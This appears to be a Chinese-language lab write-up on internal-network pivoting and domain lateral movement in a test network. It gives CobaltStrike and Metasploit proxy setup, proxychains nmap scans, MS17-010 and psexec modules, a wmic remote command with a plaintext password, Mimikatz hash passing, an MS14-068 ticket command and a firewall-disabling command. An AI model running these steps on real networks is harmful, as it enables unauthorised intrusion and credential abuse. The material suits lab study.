kali:192.168.239.0/24
win7:192.168.239.0/24 192.168.52.0/24
win2003:192.168.52.0/24
win2008:192.168.52.0/24
以下用到的工具可以gitthub上下载。
CobaltStrike代理
开启CobaltStrike
在命令行中输入
socks 2222
通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示:
之后便可以访问内网
也可以用用 proxychains 工具进行内网探测,修改/etc/proxychains4.conf的内容:
之后可以进行扫描端口与存活主机
主机
proxychains4 nmap -sT 192.168.52.0/24
端口
proxychains4 nmap -sT -Pn 192.168.52.138
MSF代理
给靶机添加路由,这里使用post/multi/manage/autoroute
# msf操作
route add 192.168.138.0 255.255.255.0 2
route print
# session操作(这里使用这种方式添加路由)
run autoroute -s 192.168.138.0/24
run autoroute -p
使用模块为:
auxiliary/server/socks_proxy
可以不用修改直接run,也可以修改端口号,这里默认端口号为1080
之后在/etc/proxychains4.conf添加
之后可以进行扫描端口与存活主机
主机
proxychains4 nmap -sT 192.168.52.0/24
端口
proxychains4 nmap -sT -Pn 192.168.52.138
内网横向移动
使用ms_017
auxiliary/scanner/smb/smb_ms17_010 #探索哪些主机有漏洞
exploit/windows/smb/ms17_010_psexec#攻击得到shell
exploit/windows/smb/psexec 设置Domain,user,password
MS17010尝试
Ladon 192.168.138.138 MS17010
域横向移动SMB服务利用-psexec(需要开启445端口,官网自带不会被杀)
psexec第一种:先有IPC链接,psexec需要明文或hash传递
psexec尝试
这款pth神器是不得不用的。内网主机大概率是不出网的,先添加一个smb beacon。
尝试使用域管账户administrator的账户和密码去撞:
这里直接就拿下了,域管账户去pth成功的概率是很高的。
psexec第二种:不用建立IPC直接提供明文账户密码![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/784291236ee8c9c3e10a647165d1c6b6.png)
smbexec无需先ipc链接 明文或hash传递
域横向移动WMI服务利用-cscript,wmiexec,wmic(135端口)
WMI(Windows Management Instrumentation)是通过135端口进行利用,支持用户明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹(APT或者内网渗透)
C:\Users\Administrator>wmic /node:192.168.52.0 /user:liukaifeng01 /password:12
3.com process call create “cmd.exe /c ipconfig > c:\1.txt”
案例1:域横向移动PTH传递-利用Mimikatz进行hash传递
第一个是在域中进行hash传递,第二个是工作组
案例2:域横向移动PTK传递-利用Mimikatz进行AES keys传递
案例3:kekeo&loca
l
第一种利用漏洞
klist purge 删除所有凭证
第二种利用工具kekeo
第三种:利用本地票据(需要管理员权限)
第四种:域横向移动PTT传递-MS1406
获取域内普通账户sid:(whoami /user 或wmic useraccount get name,sid )
用已知普通域账户leo的明文密码去制造票据。
shell ms14-068.exe -u leo@sun.com -s S-1-5-21-3388020223-1982701712-4030140183-1110 -d 192.168.138.138 -p 123.com
第五种:国产Ladon杀器测试验收
Ladon用法:https://blog.csdn.net/k8gege/article/details/106463082
例如:
Ladon 192.168.138.138 MS17010
出现的问题:
执行命令还是出现6118错误,这个可能是防火墙造成的,使用命令直接关闭防火墙。
netsh advfirewall set allprofiles state off
本文参考链接:
msf添加路由:
https://www.cnblogs.com/1008612mrzou/p/13183906.html
https://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247486678&idx=1&sn=f54bc2194d260bc7e68518ad87052af8&chksm=ebb6e3d5dcc16ac38afa17602d71a216170d2936519c3398c7211ddbf6d04673ebc48ec2a526&scene=21
内网横向移动
https://blog.csdn.net/qq_23936389/article/details/106485111
https://mp.weixin.qq.com/s/lxiIaSW1oyAkqD0oBm9q4g
CobaltStrike代理:
https://blog.csdn.net/weixin_41489908/article/details/109174048